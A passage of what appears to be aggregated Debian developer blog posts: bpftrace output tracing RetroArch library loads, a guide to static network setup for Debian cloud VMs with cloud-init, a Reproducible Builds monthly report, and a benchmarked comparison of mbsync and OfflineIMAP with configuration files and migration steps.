3394   retroarch          2 /lib/x86_64-linux-gnu/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/glibc-hwcaps/x86-64-v2/libgamemode.so
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/tls/x86_64/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/tls/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/tls/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/tls/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/x86_64/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/libgamemode.so.0
3394   retroarch          2 /lib/glibc-hwcaps/x86-64-v2/libgamemode.so.0
3394   retroarch          2 /lib/tls/x86_64/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/tls/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/tls/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/tls/libgamemode.so.0
3394   retroarch          2 /lib/x86_64/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/libgamemode.so.0
3394   retroarch          2 /usr/lib/glibc-hwcaps/x86-64-v2/libgamemode.so.0
3394   retroarch          2 /usr/lib/tls/x86_64/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/tls/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/tls/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/tls/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/x86_64/libgamemode.so.0
3394   retroarch          2 /usr/lib/libgamemode.so.0
3394   retroarch          2 /lib/x86_64-linux-gnu/libgamemode.so
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/libgamemode.so
3394   retroarch          2 /lib/libgamemode.so
3394   retroarch          2 /usr/lib/libgamemode.so
3394   retroarch          2 /lib/x86_64-linux-gnu/libdecor-0.so
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/libdecor-0.so
3394   retroarch          2 /lib/libdecor-0.so
3394   retroarch          2 /usr/lib/libdecor-0.so
3394   retroarch          2 /etc/drirc
3394   retroarch          2 /home/noodles/.drirc
3394   retroarch          2 /etc/drirc
3394   retroarch          2 /home/noodles/.drirc
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/dri/tls/iris_dri.so
3394   retroarch          2 /lib/x86_64-linux-gnu/../lib/glibc-hwcaps/x86-64-v2/libedit.so.
3394   retroarch          2 /lib/x86_64-linux-gnu/../lib/tls/x86_64/x86_64/libedit.so.2
3394   retroarch          2 /lib/x86_64-linux-gnu/../lib/tls/x86_64/libedit.so.2
3394   retroarch          2 /lib/x86_64-linux-gnu/../lib/tls/x86_64/libedit.so.2
3394   retroarch          2 /lib/x86_64-linux-gnu/../lib/tls/libedit.so.2
3394   retroarch          2 /lib/x86_64-linux-gnu/../lib/x86_64/x86_64/libedit.so.2
3394   retroarch          2 /lib/x86_64-linux-gnu/../lib/x86_64/libedit.so.2
3394   retroarch          2 /lib/x86_64-linux-gnu/../lib/x86_64/libedit.so.2
3394   retroarch          2 /lib/x86_64-linux-gnu/../lib/libedit.so.2
3394   retroarch          2 /etc/drirc
3394   retroarch          2 /home/noodles/.drirc
3394   retroarch          2 /etc/drirc
3394   retroarch          2 /home/noodles/.drirc
3394   retroarch          2 /etc/drirc
3394   retroarch          2 /home/noodles/.drirc
3394   retroarch          2 /home/noodles/.Xdefaults-udon
3394   retroarch          2 /home/noodles/.icons/default/cursors/00000000000000000000000000
3394   retroarch          2 /home/noodles/.icons/default/index.theme
3394   retroarch          2 /usr/share/icons/default/cursors/000000000000000000000000000000
3394   retroarch          2 /usr/share/pixmaps/default/cursors/0000000000000000000000000000
3394   retroarch          2 /home/noodles/.icons/Adwaita/cursors/00000000000000000000000000
3394   retroarch          2 /home/noodles/.icons/Adwaita/index.theme
3394   retroarch          2 /usr/share/icons/Adwaita/cursors/000000000000000000000000000000
3394   retroarch          2 /usr/share/pixmaps/Adwaita/cursors/0000000000000000000000000000
3394   retroarch          2 /home/noodles/.icons/hicolor/cursors/00000000000000000000000000
3394   retroarch          2 /home/noodles/.icons/hicolor/index.theme
3394   retroarch          2 /usr/share/icons/hicolor/cursors/000000000000000000000000000000
3394   retroarch          2 /usr/share/pixmaps/hicolor/cursors/0000000000000000000000000000
3394   retroarch          2 /usr/share/pixmaps/hicolor/index.theme
3394   retroarch          2 /home/noodles/.XCompose
3394   retroarch          2 /home/noodles/.icons/default/cursors/00000000000000000000000000
3394   retroarch          2 /home/noodles/.icons/default/index.theme
3394   retroarch          2 /usr/share/icons/default/cursors/000000000000000000000000000000
3394   retroarch          2 /usr/share/pixmaps/default/cursors/0000000000000000000000000000
3394   retroarch          2 /home/noodles/.icons/Adwaita/cursors/00000000000000000000000000
3394   retroarch          2 /home/noodles/.icons/Adwaita/index.theme
3394   retroarch          2 /usr/share/icons/Adwaita/cursors/000000000000000000000000000000
3394   retroarch          2 /usr/share/pixmaps/Adwaita/cursors/0000000000000000000000000000
3394   retroarch          2 /home/noodles/.icons/hicolor/cursors/00000000000000000000000000
3394   retroarch          2 /home/noodles/.icons/hicolor/index.theme
3394   retroarch          2 /usr/share/icons/hicolor/cursors/000000000000000000000000000000
3394   retroarch          2 /usr/share/pixmaps/hicolor/cursors/0000000000000000000000000000
3394   retroarch          2 /usr/share/pixmaps/hicolor/index.theme
3394   retroarch          2 /usr/share/libretro/assets/xmb/monochrome/png/disc.png
3394   retroarch          2 /usr/share/libretro/assets/xmb/monochrome/sounds
3394   retroarch          2 /usr/share/libretro/assets/sounds
3394   retroarch          2 /sys/class/power_supply/ACAD
3394   retroarch          2 /sys/class/power_supply/ACAD
3394   retroarch          2 /usr/share/libretro/assets/xmb/monochrome/png/disc.png
3394   retroarch          2 /usr/share/libretro/assets/ozone/sounds
3394   retroarch          2 /usr/share/libretro/assets/sounds
This was incredibly useful - the only theme image I was missing is disc.png from XMB Monochrome (which fails to have SVG source). I also discovered the runtime optional loading of GameMode. This is available in Debian so it was a simple matter to add libgamemode0 to the binary package Recommends. So, a very basic example of using bpftrace, but a remarkably useful intro to it from my point of view!

22 August 2022

Simon Josefsson: Static network config with Debian Cloud images

I self-host some services on virtual machines (VMs), and I m currently using Debian 11.x as the host machine relying on the libvirt infrastructure to manage QEMU/KVM machines. While everything has worked fine for years (including on Debian 10.x), there has always been one issue causing a one-minute delay every time I install a new VM: the default images run a DHCP client that never succeeds in my environment. I never found out a way to disable DHCP in the image, and none of the documented ways through cloud-init that I have tried worked. A couple of days ago, after reading the AlmaLinux wiki I found a solution that works with Debian. The following commands creates a Debian VM with static network configuration without the annoying one-minute DHCP delay. The three essential cloud-init keywords are the NoCloud meta-data parameters dsmode:local, static network-interfaces setting combined with the user-data bootcmd keyword. I m using a Raptor CS Talos II ppc64el machine, so replace the image link with a genericcloud amd64 image if you are using x86.
wget https://cloud.debian.org/images/cloud/bullseye/latest/debian-11-generic-ppc64el.qcow2
cp debian-11-generic-ppc64el.qcow2 foo.qcow2
cat>meta-data
dsmode: local
network-interfaces:  
 iface enp0s1 inet static
 address 192.168.98.14/24
 gateway 192.168.98.12
^D
cat>user-data
#cloud-config
fqdn: foo.mydomain
manage_etc_hosts: true
disable_root: false
ssh_pwauth: false
ssh_authorized_keys:
- ssh-ed25519 AAAA...
timezone: Europe/Stockholm
bootcmd:
- rm -f /run/network/interfaces.d/enp0s1
- ifup enp0s1
^D
virt-install --name foo --import --os-variant debian10 --disk foo.qcow2 --cloud-init meta-data=meta-data,user-data=user-data
Unfortunately virt-install from Debian 11 does not support the cloud-init network-config parameter, so if you want to use a version 2 network configuration with cloud-init (to specify IPv6 addresses, for example) you need to replace the final virt-install command with the following.
cat>network_config_static.cfg
version: 2
 ethernets:
  enp0s1:
   dhcp4: false
   addresses: [ 192.168.98.14/24, fc00::14/7 ]
   gateway4: 192.168.98.12
   gateway6: fc00::12
   nameservers:
    addresses: [ 192.168.98.12, fc00::12 ]
^D
cloud-localds -v -m local --network-config=network_config_static.cfg seed.iso user-data
virt-install --name foo --import --os-variant debian10 --disk foo.qcow2 --disk seed.iso,readonly=on --noreboot
virsh start foo
virsh detach-disk foo vdb --config
virsh console foo
There are still some warnings like the following, but it does not seem to cause any problem: [FAILED] Failed to start Initial cloud-init job (pre-networking). Finally, if you do not want the cloud-init tools installed in your VMs, I found the following set of additional user-data commands helpful. Cloud-init will not be enabled on first boot and a cron job will be added that purges some unwanted packages.
runcmd:
- touch /etc/cloud/cloud-init.disabled
- apt-get update && apt-get dist-upgrade -uy && apt-get autoremove --yes --purge && printf '#!/bin/sh\n  rm /etc/cloud/cloud-init.disabled /etc/cloud/cloud.cfg.d/01_debian_cloud.cfg && apt-get purge --yes cloud-init cloud-guest-utils cloud-initramfs-growroot genisoimage isc-dhcp-client && apt-get autoremove --yes --purge && rm -f /etc/cron.hourly/cloud-cleanup && shutdown --reboot +1;   2>&1   logger -t cloud-cleanup\n' > /etc/cron.hourly/cloud-cleanup && chmod +x /etc/cron.hourly/cloud-cleanup && reboot &
The production script I m using is a bit more complicated, but can be downloaded as vello-vm. Happy hacking!

5 February 2022

Reproducible Builds: Reproducible Builds in January 2022

Welcome to the January 2022 report from the Reproducible Builds project. In our reports, we try outline the most important things that have been happening in the past month. As ever, if you are interested in contributing to the project, please visit our Contribute page on our website.
An interesting blog post was published by Paragon Initiative Enterprises about Gossamer, a proposal for securing the PHP software supply-chain. Utilising code-signing and third-party attestations, Gossamer aims to mitigate the risks within the notorious PHP world via publishing attestations to a transparency log. Their post, titled Solving Open Source Supply Chain Security for the PHP Ecosystem goes into some detail regarding the design, scope and implementation of the system.
This month, the Linux Foundation announced SupplyChainSecurityCon, a conference focused on exploring the security threats affecting the software supply chain, sharing best practices and mitigation tactics. The conference is part of the Linux Foundation s Open Source Summit North America and will take place June 21st 24th 2022, both virtually and in Austin, Texas.

Debian There was a significant progress made in the Debian Linux distribution this month, including:

Other distributions kpcyrd reported on Twitter about the release of version 0.2.0 of pacman-bintrans, an experiment with binary transparency for the Arch Linux package manager, pacman. This new version is now able to query rebuilderd to check if a package was independently reproduced.
In the world of openSUSE, however, Bernhard M. Wiedemann posted his monthly reproducible builds status report.

diffoscope diffoscope is our in-depth and content-aware diff utility. Not only can it locate and diagnose reproducibility issues, it can provide human-readable diffs from many kinds of binary formats. This month, Chris Lamb prepared and uploaded versions 199, 200, 201 and 202 to Debian unstable (that were later backported to Debian bullseye-backports by Mattia Rizzolo), as well as made the following changes to the code itself:
  • New features:
    • First attempt at incremental output support with a timeout. Now passing, for example, --timeout=60 will mean that diffoscope will not recurse into any sub-archives after 60 seconds total execution time has elapsed. Note that this is not a fixed/strict timeout due to implementation issues. [ ][ ]
    • Support both variants of odt2txt, including the one provided by the unoconv package. [ ]
  • Bug fixes:
    • Do not return with a UNIX exit code of 0 if we encounter with a file whose human-readable metadata matches literal file contents. [ ]
    • Don t fail if comparing a nonexistent file with a .pyc file (and add test). [ ][ ]
    • If the debian.deb822 module raises any exception on import, re-raise it as an ImportError. This should fix diffoscope on some Fedora systems. [ ]
    • Even if a Sphinx .inv inventory file is labelled The remainder of this file is compressed using zlib, it might not actually be. In this case, don t traceback and simply return the original content. [ ]
  • Documentation:
    • Improve documentation for the new --timeout option due to a few misconceptions. [ ]
    • Drop reference in the manual page claiming the ability to compare non-existent files on the command-line. (This has not been possible since version 32 which was released in September 2015). [ ]
    • Update X has been modified after NT_GNU_BUILD_ID has been applied messages to, for example, not duplicating the full filename in the diffoscope output. [ ]
  • Codebase improvements:
    • Tidy some control flow. [ ]
    • Correct a recompile typo. [ ]
In addition, Alyssa Ross fixed the comparison of CBFS names that contain spaces [ ], Sergei Trofimovich fixed whitespace for compatibility with version 21.12 of the Black source code reformatter [ ] and Zbigniew J drzejewski-Szmek fixed JSON detection with a new version of file [ ].

Testing framework The Reproducible Builds project runs a significant testing framework at tests.reproducible-builds.org, to check packages and other artifacts for reproducibility. This month, the following changes were made:
  • Fr d ric Pierret (fepitre):
    • Add Debian bookworm to package set creation. [ ]
  • Holger Levsen:
    • Install the po4a package where appropriate, as it is needed for the Reproducible Builds website job [ ]. In addition, also run the i18n.sh and contributors.sh scripts [ ].
    • Correct some grammar in Debian live image build output. [ ]
    • Shell monitor improvements:
      • Only show the offline node section if there are offline nodes. [ ]
      • Colorise offline nodes. [ ]
      • Shrink screen usage. [ ][ ][ ]
    • Node health check improvements:
      • Detect if live package builds encounter incomplete snapshots. [ ][ ][ ]
      • Detect if a host is running with today s date (when it should be set artificially in the future). [ ]
    • Use the devscripts package from bullseye-backports on Debian nodes. [ ]
    • Use the Munin monitoring package bullseye-backports on Debian nodes too. [ ]
    • Update New Year handling, needed to be able to detect real and fake dates. [ ][ ]
    • Improve the error message of the script that powercycles the arm64 architecture nodes hosted by Codethink. [ ]
  • Mattia Rizzolo:
    • Use the new --timeout option added in diffoscope version 202. [ ]
  • Roland Clobus:
    • Update the build scripts now that the hooks for live builds are now maintained upstream in the live-build repository. [ ]
    • Show info lines in Jenkins when reproducible hooks have been active. [ ]
    • Use unique folders for the artifacts from each live Debian version. [ ]
  • Vagrant Cascadian:
    • Switch the Debian armhf architecture nodes to use new proxy. [ ]
    • Misc. node maintenance. [ ].

Upstream patches The Reproducible Builds project attempts to fix as many currently-unreproducible packages as possible. In January, we wrote a large number of such patches, including:

And finally If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:

21 November 2021

Antoine Beaupr : mbsync vs OfflineIMAP

After recovering from my latest email crash (previously, previously), I had to figure out which tool I should be using. I had many options but I figured I would start with a popular one (mbsync). But I also evaluated OfflineIMAP which was resurrected from the Python 2 apocalypse, and because I had used it before, for a long time. Read on for the details.

Benchmark setup All programs were tested against a Dovecot 1:2.3.13+dfsg1-2 server, running Debian bullseye. The client is a Purism 13v4 laptop with a Samsung SSD 970 EVO 1TB NVMe drive. The server is a custom build with a AMD Ryzen 5 2600 CPU, and a RAID-1 array made of two NVMe drives (Intel SSDPEKNW010T8 and WDC WDS100T2B0C). The mail spool I am testing against has almost 400k messages and takes 13GB of disk space:
$ notmuch count --exclude=false
372758
$ du -sh --exclude xapian Maildir
13G Maildir
The baseline we are comparing against is SMD (syncmaildir) which performs the sync in about 7-8 seconds locally (3.5 seconds for each push/pull command) and about 10-12 seconds remotely. Anything close to that or better is good enough. I do not have recent numbers for a SMD full sync baseline, but the setup documentation mentions 20 minutes for a full sync. That was a few years ago, and the spool has obviously grown since then, so that is not a reliable baseline. A baseline for a full sync might be also set with rsync, which copies files at nearly 40MB/s, or 317Mb/s!
anarcat@angela:tmp(main)$ time rsync -a --info=progress2 --exclude xapian  shell.anarc.at:Maildir/ Maildir/
 12,647,814,731 100%   37.85MB/s    0:05:18 (xfr#394981, to-chk=0/395815)    
72.38user 106.10system 5:19.59elapsed 55%CPU (0avgtext+0avgdata 15988maxresident)k
8816inputs+26305112outputs (0major+50953minor)pagefaults 0swaps
That is 5 minutes to transfer the entire spool. Incremental syncs are obviously pretty fast too:
anarcat@angela:tmp(main)$ time rsync -a --info=progress2 --exclude xapian  shell.anarc.at:Maildir/ Maildir/
              0   0%    0.00kB/s    0:00:00 (xfr#0, to-chk=0/395815)    
1.42user 0.81system 0:03.31elapsed 67%CPU (0avgtext+0avgdata 14100maxresident)k
120inputs+0outputs (3major+12709minor)pagefaults 0swaps
As an extra curiosity, here's the performance with tar, pretty similar with rsync, minus incremental which I cannot be bothered to figure out right now:
anarcat@angela:tmp(main)$ time ssh shell.anarc.at tar --exclude xapian -cf - Maildir/   pv -s 13G   tar xf - 
56.68user 58.86system 5:17.08elapsed 36%CPU (0avgtext+0avgdata 8764maxresident)k
0inputs+0outputs (0major+7266minor)pagefaults 0swaps
12,1GiO 0:05:17 [39,0MiB/s] [===================================================================> ] 92%
Interesting that rsync manages to almost beat a plain tar on file transfer, I'm actually surprised by how well it performs here, considering there are many little files to transfer. (But then again, this maybe is exactly where rsync shines: while tar needs to glue all those little files together, rsync can just directly talk to the other side and tell it to do live changes. Something to look at in another article maybe?) Since both ends are NVMe drives, those should easily saturate a gigabit link. And in fact, a backup of the server mail spool achieves much faster transfer rate on disks:
anarcat@marcos:~$ tar fc - Maildir   pv -s 13G > Maildir.tar
15,0GiO 0:01:57 [ 131MiB/s] [===================================] 115%
That's 131Mibyyte per second, vastly faster than the gigabit link. The client has similar performance:
anarcat@angela:~(main)$ tar fc - Maildir   pv -s 17G > Maildir.tar
16,2GiO 0:02:22 [ 116MiB/s] [==================================] 95%
So those disks should be able to saturate a gigabit link, and they are not the bottleneck on fast links. Which begs the question of what is blocking performance of a similar transfer over the gigabit link, but that's another question altogether, because no sync program ever reaches the above performance anyways. Finally, note that when I migrated to SMD, I wrote a small performance comparison that could be interesting here. It show SMD to be faster than OfflineIMAP, but not as much as we see here. In fact, it looks like OfflineIMAP slowed down significantly since then (May 2018), but this could be due to my larger mail spool as well.

mbsync The isync (AKA mbsync) project is written in C and supports syncing Maildir and IMAP folders, with possibly multiple replicas. I haven't tested this but I suspect it might be possible to sync between two IMAP servers as well. It supports partial mirorrs, message flags, full folder support, and "trash" functionality.

Complex configuration file I started with this .mbsyncrc configuration file:
SyncState *
Sync New ReNew Flags
IMAPAccount anarcat
Host imap.anarc.at
User anarcat
PassCmd "pass imap.anarc.at"
SSLType IMAPS
CertificateFile /etc/ssl/certs/ca-certificates.crt
IMAPStore anarcat-remote
Account anarcat
MaildirStore anarcat-local
# Maildir/top/sub/sub
#SubFolders Verbatim
# Maildir/.top.sub.sub
SubFolders Maildir++
# Maildir/top/.sub/.sub
# SubFolders legacy
# The trailing "/" is important
#Path ~/Maildir-mbsync/
Inbox ~/Maildir-mbsync/
Channel anarcat
# AKA Far, convert when all clients are 1.4+
Master :anarcat-remote:
# AKA Near
Slave :anarcat-local:
# Exclude everything under the internal [Gmail] folder, except the interesting folders
#Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail"
# Or include everything
Patterns *
# Automatically create missing mailboxes, both locally and on the server
#Create Both
Create slave
# Sync the movement of messages between folders and deletions, add after making sure the sync works
#Expunge Both
Long gone are the days where I would spend a long time reading a manual page to figure out the meaning of every option. If that's your thing, you might like this one. But I'm more of a "EXAMPLES section" kind of person now, and I somehow couldn't find a sample file on the website. I started from the Arch wiki one but it's actually not great because it's made for Gmail (which is not a usual Dovecot server). So a sample config file in the manpage would be a great addition. Thankfully, the Debian packages ships one in /usr/share/doc/isync/examples/mbsyncrc.sample but I only found that after I wrote my configuration. It was still useful and I recommend people take a look if they want to understand the syntax. Also, that syntax is a little overly complicated. For example, Far needs colons, like:
Far :anarcat-remote:
Why? That seems just too complicated. I also found that sections are not clearly identified: IMAPAccount and Channel mark section beginnings, for example, which is not at all obvious until you learn about mbsync's internals. There are also weird ordering issues: the SyncState option needs to be before IMAPAccount, presumably because it's global. Using a more standard format like .INI or TOML could improve that situation.

Stellar performance A transfer of the entire mail spool takes 56 minutes and 6 seconds, which is impressive. It's not quite "line rate": the resulting mail spool was 12GB (which is a problem, see below), which turns out to be about 29Mbit/s and therefore not maxing the gigabit link, and an order of magnitude slower than rsync. The incremental runs are roughly 2 seconds, which is even more impressive, as that's actually faster than rsync:
===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        2.015       0.052       1.930       2.029       2.105       
user        0.660       0.040       0.592       0.661       0.722       
sys         0.338       0.033       0.268       0.341       0.387    
Those tests were performed with isync 1.3.0-2.2 on Debian bullseye. Tests with a newer isync release originally failed because of a corrupted message that triggered bug 999804 (see below). Running 1.4.3 under valgrind works around the bug, but adds a 50% performance cost, the full sync running in 1h35m. Once the upstream patch is applied, performance with 1.4.3 is fairly similar, considering that the new sync included the register folder with 4000 messages:
120.74user 213.19system 59:47.69elapsed 9%CPU (0avgtext+0avgdata 105420maxresident)k
29128inputs+28284376outputs (0major+45711minor)pagefaults 0swaps
That is ~13GB in ~60 minutes, which gives us 28.3Mbps. Incrementals are also pretty similar to 1.3.x, again considering the double-connect cost:
===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        2.500       0.087       2.340       2.491       2.629       
user        0.718       0.037       0.679       0.711       0.793       
sys         0.322       0.024       0.284       0.320       0.365
Those tests were all done on a Gigabit link, but what happens on a slower link? My server uplink is slow: 25 Mbps down, 6 Mbps up. There mbsync is worse than the SMD baseline:
===> multitime results
1: mbsync -a
Mean        Std.Dev.    Min         Median      Max
real        31.531      0.724       30.764      31.271      33.100      
user        1.858       0.125       1.721       1.818       2.131       
sys         0.610       0.063       0.506       0.600       0.695       
That's 30 seconds for a sync, which is an order of magnitude slower than SMD.

Great user interface Compared to OfflineIMAP and (ahem) SMD, the mbsync UI is kind of neat:
anarcat@angela:~(main)$ mbsync -a
Notice: Master/Slave are deprecated; use Far/Near instead.
C: 1/2  B: 204/205  F: +0/0 *0/0 #0/0  N: +1/200 *0/0 #0/0
(Note that nice switch away from slavery-related terms too.) The display is minimal, and yet informative. It's not obvious what does mean at first glance, but the manpage is useful at least for clarifying that:
This represents the cumulative progress over channels, boxes, and messages affected on the far and near side, respectively. The message counts represent added messages, messages with updated flags, and trashed messages, respectively. No attempt is made to calculate the totals in advance, so they grow over time as more information is gathered. (Emphasis mine).
In other words:
  • C 2/2: channels done/total (2 done out of 2)
  • B 204/205: mailboxes done/total (204 out of 205)
  • F: changes on the far side
  • N: +10/200 *0/0 #0/0: changes on the "near" side:
    • +10/200: 10 out of 200 messages downloaded
    • *0/0: no flag changed
    • #0/0: no message deleted
You get used to it, in a good way. It does not, unfortunately, show up when you run it in systemd, which is a bit annoying as I like to see a summary mail traffic in the logs.

Interoperability issue In my notmuch setup, I have bound key S to "mark spam", which basically assigns the tag spam to the message and removes a bunch of others. Then I have a notmuch-purge script which moves that message to the spam folder, for training purposes. It basically does this:
notmuch search --output=files --format=text0 "$search_spam" \
      xargs -r -0 mv -t "$HOME/Maildir/$ PREFIX junk/cur/"
This method, which worked fine in SMD (and also OfflineIMAP) created this error on sync:
Maildir error: duplicate UID 37578.
And indeed, there are now two messages with that UID in the mailbox:
anarcat@angela:~(main)$ find Maildir/.junk/ -name '*U=37578*'
Maildir/.junk/cur/1637427889.134334_2.angela,U=37578:2,S
Maildir/.junk/cur/1637348602.2492889_221804.angela,U=37578:2,S
This is actually a known limitation or, as mbsync(1) calls it, a "RECOMMENDATION":
When using the more efficient default UID mapping scheme, it is important that the MUA renames files when moving them between Maildir fold ers. Mutt always does that, while mu4e needs to be configured to do it:
(setq mu4e-change-filenames-when-moving t)
So it seems I would need to fix my script. It's unclear how the paths should be renamed, which is unfortunate, because I would need to change my script to adapt to mbsync, but I can't tell how just from reading the above. (A manual fix is actually to rename the file to remove the U= field: mbsync will generate a new one and then sync correctly.) Fortunately, someone else already fixed that issue: afew, a notmuch tagging script (much puns, such hurt), has a move mode that can rename files correctly, specifically designed to deal with mbsync. I had already been told about afew, but it's one more reason to standardize my notmuch hooks on that project, it looks like. Update: I have tried to use afew and found it has significant performance issues. It also has a completely different paradigm to what I am used to: it assumes all incoming mail has a new and lays its own tags on top of that (inbox, sent, etc). It can only move files from one folder at a time (see this bug) which breaks my spam training workflow. In general, I sync my tags into folders (e.g. ham, spam, sent) and message flags (e.g. inbox is F, unread is "not S", etc), and afew is not well suited for this (although there are hacks that try to fix this). I have worked hard to make my tagging scripts idempotent, and it's something afew doesn't currently have. Still, it would be better to have that code in Python than bash, so maybe I should consider my options here.

Stability issues The newer release in Debian bookworm (currently at 1.4.3) has stability issues on full sync. I filed bug 999804 in Debian about this, which lead to a thread on the upstream mailing list. I have found at least three distinct crashes that could be double-free bugs "which might be exploitable in the worst case", not a reassuring prospect. The thing is: mbsync is really fast, but the downside of that is that it's written in C, and with that comes a whole set of security issues. The Debian security tracker has only three CVEs on isync, but the above issues show there could be many more. Reading the source code certainly did not make me very comfortable with trusting it with untrusted data. I considered sandboxing it with systemd (below) but having systemd run as a --user process makes that difficult. I also considered using an apparmor profile but that is not trivial because we need to allow SSH and only some parts of it... Thankfully, upstream has been diligent at addressing the issues I have found. They provided a patch within a few days which did fix the sync issues. Update: upstream actually took the issue very seriously. They not only got CVE-2021-44143 assigned for my bug report, they also audited the code and found several more issues collectively identified as CVE-2021-3657, which actually also affect 1.3 (ie. Debian 11/bullseye/stable). Somehow my corpus doesn't trigger that issue, but it was still considered serious enough to warrant a CVE. So one the one hand: excellent response from upstream; but on the other hand: how many more of those could there be in there?

Automation with systemd The Arch wiki has instructions on how to setup mbsync as a systemd service. It suggests using the --verbose (-V) flag which is a little intense here, as it outputs 1444 lines of messages. I have used the following .service file:
[Unit]
Description=Mailbox synchronization service
ConditionHost=!marcos
Wants=network-online.target
After=network-online.target
Before=notmuch-new.service
[Service]
Type=oneshot
ExecStart=/usr/bin/mbsync -a
Nice=10
IOSchedulingClass=idle
NoNewPrivileges=true
[Install]
WantedBy=default.target
And the following .timer:
[Unit]
Description=Mailbox synchronization timer
ConditionHost=!marcos
[Timer]
OnBootSec=2m
OnUnitActiveSec=5m
Unit=mbsync.service
[Install]
WantedBy=timers.target
Note that we trigger notmuch through systemd, with the Before and also by adding mbsync.service to the notmuch-new.service file:
[Unit]
Description=notmuch new
After=mbsync.service
[Service]
Type=oneshot
Nice=10
ExecStart=/usr/bin/notmuch new
[Install]
WantedBy=mbsync.service
An improvement over polling repeatedly with a .timer would be to wake up only on IMAP notify, but neither imapnotify nor goimapnotify seem to be packaged in Debian. It would also not cover for the "sent folder" use case, where we need to wake up on local changes.

Password-less setup The sample file suggests this should work:
IMAPStore remote
Tunnel "ssh -q host.remote.com /usr/sbin/imapd"
Add BatchMode, restrict to IdentitiesOnly, provide a password-less key just for this, add compression (-C), find the Dovecot imap binary, and you get this:
IMAPAccount anarcat-tunnel
Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C anarcat@imap.anarc.at /usr/lib/dovecot/imap"
And it actually seems to work:
$ mbsync -a
Notice: Master/Slave are deprecated; use Far/Near instead.
C: 0/2  B: 0/1  F: +0/0 *0/0 #0/0  N: +0/0 *0/0 #0/0imap(anarcat): Error: net_connect_unix(/run/dovecot/stats-writer) failed: Permission denied
C: 2/2  B: 205/205  F: +0/0 *0/0 #0/0  N: +1/1 *3/3 #0/0imap(anarcat)<1611280><90uUOuyElmEQlhgAFjQyWQ>: Info: Logged out in=10808 out=15396642 deleted=0 expunged=0 trashed=0 hdr_count=0 hdr_bytes=0 body_count=1 body_bytes=8087
It's a bit noisy, however. dovecot/imap doesn't have a "usage" to speak of, but even the source code doesn't hint at a way to disable that Error message, so that's unfortunate. That socket is owned by root:dovecot so presumably Dovecot runs the imap process as $user:dovecot, which we can't do here. Oh well? Interestingly, the SSH setup is not faster than IMAP. With IMAP:
===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        2.367       0.065       2.220       2.376       2.458       
user        0.793       0.047       0.731       0.776       0.871       
sys         0.426       0.040       0.364       0.434       0.476
With SSH:
===> multitime results
1: mbsync -a
            Mean        Std.Dev.    Min         Median      Max
real        2.515       0.088       2.274       2.532       2.594       
user        0.753       0.043       0.645       0.766       0.804       
sys         0.328       0.045       0.212       0.340       0.393
Basically: 200ms slower. Tolerable.

Migrating from SMD The above was how I migrated to mbsync on my first workstation. The work on the second one was more streamlined, especially since the corruption on mailboxes was fixed:
  1. install isync, with the patch:
    dpkg -i isync_1.4.3-1.1~_amd64.deb
    
  2. copy all files over from previous workstation to avoid a full resync (optional):
    rsync -a --info=progress2 angela:Maildir/ Maildir-mbsync/
    
  3. rename all files to match new hostname (optional):
    find Maildir-mbsync/ -type f -name '*.angela,*' -print0    rename -0 's/\.angela,/\.curie,/'
    
  4. trash the notmuch database (optional):
    rm -rf Maildir-mbsync/.notmuch/xapian/
    
  5. disable all smd and notmuch services:
    systemctl --user --now disable smd-pull.service smd-pull.timer smd-push.service smd-push.timer notmuch-new.service notmuch-new.timer
    
  6. do one last sync with smd:
    smd-pull --show-tags ; smd-push --show-tags ; notmuch new ; notmuch-sync-flagged -v
    
  7. backup notmuch on the client and server:
    notmuch dump   pv > notmuch.dump
    
  8. backup the maildir on the client and server:
    cp -al Maildir Maildir-bak
    
  9. create the SSH key:
    ssh-keygen -t ed25519 -f .ssh/id_ed25519_mbsync
    cat .ssh/id_ed25519_mbsync.pub
    
  10. add to .ssh/authorized_keys on the server, like this: command="/usr/lib/dovecot/imap",restrict ssh-ed25519 AAAAC...
  11. move old files aside, if present:
    mv Maildir Maildir-smd
    
  12. move new files in place (CRITICAL SECTION BEGINS!):
    mv Maildir-mbsync Maildir
    
  13. run a test sync, only pulling changes: mbsync --create-near --remove-none --expunge-none --noop anarcat-register
  14. if that works well, try with all mailboxes: mbsync --create-near --remove-none --expunge-none --noop -a
  15. if that works well, try again with a full sync: mbsync register mbsync -a
  16. reindex and restore the notmuch database, this should take ~25 minutes:
    notmuch new
    pv notmuch.dump   notmuch restore
    
  17. enable the systemd services and retire the smd-* services: systemctl --user enable mbsync.timer notmuch-new.service systemctl --user start mbsync.timer rm ~/.config/systemd/user/smd* systemctl daemon-reload
